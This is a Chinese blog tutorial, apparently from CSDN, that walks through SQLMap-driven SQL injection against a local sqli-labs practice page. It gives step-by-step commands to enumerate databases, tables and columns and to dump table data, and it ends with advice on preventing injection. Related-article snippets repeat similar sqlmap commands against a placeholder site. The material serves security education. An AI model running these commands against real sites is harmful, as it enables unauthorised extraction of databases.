SQL进阶理论篇(二十一):基于SQLMap的自动化SQL注入

最新推荐文章于 2024-05-23 20:06:02 发布
最新推荐文章于 2024-05-23 20:06:02 发布
阅读量856 收藏
点赞数 5
分类专栏: # SQL基础 文章标签: sql 自动化
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/wlh2220133699/article/details/135188760
版权

文章目录

简介

从上一小节,可以发现,如果我们编写的代码存在着SQL注入的漏洞,后果还是很可怕的,只需要通过访问information_schema表就可以将数据库的信息全部暴露出来。

接下来我们了解下SQLMap工具,它可以帮我们自动化完成SQL注入的过程。让我们使用SQLmap工具,再重现一下上一节做的人工注入的步骤。

获取当前数据库和用户信息

执行以下命令:

python sqlmap.py -u "http://localhost/sqli-labs-master/Less-1/?id=1" --current-db --current-user

--current-db表示获取当前数据库名称;

--current-user表示获取当前用户的信息

然后你可以看到SQLmap帮我们获取了相应的结果:

在这里插入图片描述

获取MySQL中的所有数据库名称

执行:

python sqlmap.py -u "http://localhost/sqli-labs-master/Less-1/?id=1" --threads=5 --dbs

这里我们使用--threads来指定SQLmap的最大并发数,通常不要超过10。

于是它帮我们获取了当前MySQL中的8个数据库名称:

在这里插入图片描述

查询wucai数据库中的所有数据表

执行:

python sqlmap.py -u "http://localhost/sqli-labs-master/Less-1/?id=1" --threads=5 -D wucai --tables

-D表示待查询的数据库的库名;

--tables表示显示出所有数据表名称;

在这里插入图片描述

查看heros数据表中的所有字段

执行:

python sqlmap.py -u "http://localhost/sqli-labs-master/Less-1/?id=1" --threads=5 -D wucai -T heros --columns

-T表示指定的数据表名称;

--columns表示对所有字段名称进行查询;

在这里插入图片描述

查询heros表中的英雄信息

执行:

python sqlmap.py -u "http://localhost/sqli-labs-master/Less-1/?id=1" -D wucai -T heros -C id,name,hp_max --dump

-C后面表示需要查询的字段名;

--dump表示展示具体数据。

在这里插入图片描述

至此,整个数据库对我们来说,就是不设防的状态了。

总结

总之,代码规范性对web安全来讲,非常重要,尽量不要采用直接拼接的方式进行查询,一定要拼接的话,必须在后端提前做好参数验证(如java的sqlparameter),不能因为在前端验证完参数就认为安全了,前端的验证是很容易被绕过的。

同时,web上线之后,还需要将生产环境中的错误提示信息关闭,坚决不能给不法分子可乘之机,以减少被SQL 注入的风险。

此外,我们也可以采用第三方的工具,比如SQLmap来对web应用进行检测,以增强web安全性。

当然,本节讲的内容都很基础,现在真正的SQL注入攻防,可比本节展示的内容复杂多了。

参考文献

  1. 37丨SQL注入:你的SQL是如何被注入的?
经年藏殊
关注
  • 5
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
java开发基于SQLmapSQL注入工具源码.zip
06-01
基于SQLmapSQL注入工具源码.。基于SQLmap,使用Java开发 安装教程 安装JDK(需要有javafx) 安装Python 安装SQLmap 基于SQLmapSQL注入工具源码.。基于SQLmap,使用Java开发 安装教程 安装JDK(需要有javafx)...
sql注入神器-sqlmap
siu~
08-24 426
SQLMap 是一个自动化SQL注入工具,其主要功能是扫描、发现并利用给定URL的SQL注入漏洞,内置了很多绕过插件,支持的数据库是MySQL 、Oracle 、PostgreSQL 、Microsoft SQL Server、Microsoft Access 、IBM DB2, SQ Lite 、Firebird 、Sybase和SAPMaxDB 。
SQL注入-SQLMAP进阶使用
xdjxi的博客
02-23 3023
实验原理 使用SQLMAP对存在POST注入点的网站进行自动化注入时,通常可以采用以下简便方法:利用Burpsuite抓包并保存HTTP request至文本文档,再利用sqlmap -r命令从文本文档中读取HTTP request并实施注入。 注入时,可以利用--technique参数指定SQLMAP使用的探测技术,B表示布尔盲注,T表示时间盲注(延迟注入)﹐E表示报错注入,U表示联合查询注入,S表示堆查询注入;利用-v参数指定显示等级,当取值大于等于3时,将显示SQLMAP所使用的payload 详情
SQL注入——SQLmap进阶使用(十三)
Gjqhs的博客
02-21 1274
SQLmap的下载和安装使用教程
SQL注入——SQLmap进阶使用(十四)
Gjqhs的博客
02-21 868
实验目的 普及SQLMAP的常用命令及SQLMAP的--cookie参数的使用方法。PS:面试时不要说打靶场什么东西,就说什么编码之类的 实验环境 攻击机:银鞍照白马 (1)操作系统:Windows10 (2)安装的应用软件:sqlmap、Burpsuite、ireFox浏览器插件HackbarF、 FoxyProxy等 (3)登录账号密码:操作系统帐号Admin,密码asdfghjkl 靶机:药罐子 (1)操作系统:本机(建议用虚拟机,特别是Linux)不过我太懒了[]~( ̄▽ ̄)~* (2)安装的应
sqlmap中文手册-sql注入自动化测试工具
07-19
sql注入自动化测试工具sqlmap的操作手册,中文版,值得拥有哦。Web安全测试必备工具。
sqlmap 自动化SQL注入工具
01-01
一个自动化SQL注入工具 1、完全支持MySQL、Oracle、PostgreSQL、MSSQL、Access、IBM DB2、SQLite、Firebird、Sybase、SAP MaxDB、HSQLDB和Informix等多种数据库管理系统。 2、完全支持布尔型盲注、时间型盲注、...
sqlmap自动化注入工具
05-19
sqlmap自动化注入工具可用于sql注入
sqlmap sql 注入测试工具
03-06
sqlmap 可以很方便的测试sql 注入 安装后直接使用
海山数据库(He3DB)代理ProxySQL使用详解:(一)架构说明与安装
weixin_42744640的博客
05-23 657
后端的MySQL实例可根据用途配置到不同的hostgroup中,由ProxySQL基于7层网络协议,将来源于APP的流量路由到对应的hostgroup内,从而实现负载均衡或者读写分离。通常用于黑名单功能,即如果匹配该规则后,如果其error_msg不为空,则客户端的操作将会接受到error_msg设置的错误信息;transaction_persistent:表示是否持久化事务,设置为1表示开启一个事务后,该事务的所有操作均在同一个hostgroup中操作完成,其会忽略设置的任何查询规则;
【Text2SQL 经典模型】TypeSQL
最新发布
VLyb
05-23 1015
借助于数据库的 table schema 检索和 knowledge graph 的检索,为 question 的每个 word 标注一个 type,从而提高 embedding 的效果当 database content 可用时,type 标注时还会进一步对 column content 做检索,并为其标注 column name,这样当用户的 question 中的所提到的列名或者条目不精确时,也可以通过这个步骤来对应到具体的数据库 column,从而提高效果,实现所谓的“内容敏感性。
OceanBase SQL 诊断和调优实践——【DBA从入门到实践】第七期
OceanBase分布式数据库的博客
05-20 1137
《DBA 从入门到实践》第七期在5月22日(周三)如期而至,为大家讲解:ODP(OceanBase Database Proxy) SQL 路由原理;如何分析 SQL 监控视图;如何阅读和管理 OceanBase SQL 执行计划;最常见的 SQL 调优方式;SQL 性能问题的典型场景和排查思路。
【Hive SQL 每日一题】分析电商平台的用户行为和订单数据
JIE的博客 --- moon_coder
05-23 933
假设你是一位数据分析师,负责分析某电商平台的用户行为和订单数据,平台上有多个用户,用户可以在不同的日期下单,每个订单包含多个商品。请你完成相关业务分析,帮助平台优化运营策略和用户体验。排序并取出平均每月订单金额和订单数量最高的两个用户。统计每个用户每月的平均订单金额和订单数量;记录订单中商品的信息。
SQL】子查询
2301_77961281的博客
05-20 678
当需要在一个查询中使用另一个查询的结果时,可以使用子查询。例如,需要在一个查询中使用另一个查询的结果作为条件进行过滤数据。当需要在一个查询中进行聚合操作,但又需要使用另一个查询的结果进行比较或筛选时,可以使用子查询。当需要在一个查询中进行多个条件的比较,而这些条件需要使用另一个查询的结果来确定时,可以使用子查询。这样说很抽象直接看下面例题。
力扣1809 没有广告的剧集(postgresql
weixin_51696882的博客
05-23 360
请查出,所有没有广告出现过的剧集。 如果观众观看了剧集,并且剧集里出现了广告,就一定会有观众观看广告的记录。 返回结果没有顺序要求。
03:PostgreSQL逻辑结构(表空间、数据库、模式、表、索引)
zyplanke的专栏
05-20 910
本文假设已经掌握SQL基本语法和数据库基础概念。包括表空间、数据库、模式、表、索引
SQL——SELECT相关的题目(力扣难度等级:简单)
戏拈秃笔的博客
05-20 1133
……刷题中……
sql server怎么存储图片
cuisidong1997的博客
05-22 602
请注意,使用OPENROWSET和BULK操作需要具有相应的权限,并且可能受到安全限制,如服务器的配置和安全策略所影响。此外,从SQL Server 2016开始,推荐使用FILESTREAM存储二进制大对象数据,这样可以将文件存储直接integrated到SQL Server中,从而提供更好的性能和管理。在SQL Server中,可以使用VARBINARY数据类型来存储图片。以下是一个简单的例子,展示了如何将图片存储到数据库中,并从数据库中检索出来。sql server怎么存储图片。
sql注入sqlmap
11-11
SQL注入是一种常见的Web应用程序漏洞,攻击者可以利用这种漏洞来获取敏感信息或者执行未经授权的操作。而Sqlmap是一款开源的自动化SQL注入工具,可以帮助安全测试人员快速检测和利用SQL注入漏洞。以下是使用Sqlmap进行SQL注入检测的步骤: 1. 确认目标网站存在SQL注入漏洞,可以通过手工注入或者使用Sqlmap进行检测。 2. 下载并安装Sqlmap,可以从官网(https://sqlmap.org/)下载最新版本。 3. 打开命令行窗口,进入Sqlmap所在的目录。 4. 输入以下命令进行基本格式的检测: ``` sqlmap -u "http://www.vuln.cn/post.php?id=1" ``` 其中,-u参数指定目标URL,id=1表示注入点的参数为id。 5. 如果需要指定数据库类型和检测级别,可以使用--dbms和--level参数,例如: ``` sqlmap -u "http://www.vuln.cn/post.php?id=1" --dbms mysql --level 3 ``` 其中,--dbms参数指定数据库类型为mysql,--level参数指定检测级别为3。 6. 如果目标网站存在302跳转,可以使用--follow-redirects参数进行跟随,例如: ``` sqlmap -u "http://www.vuln.cn/post.php?id=1" --follow-redirects ``` 7. Sqlmap会自动检测注入点的类型,并尝试利用不同的注入技术进行攻击,如果成功,会输出相应的结果。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值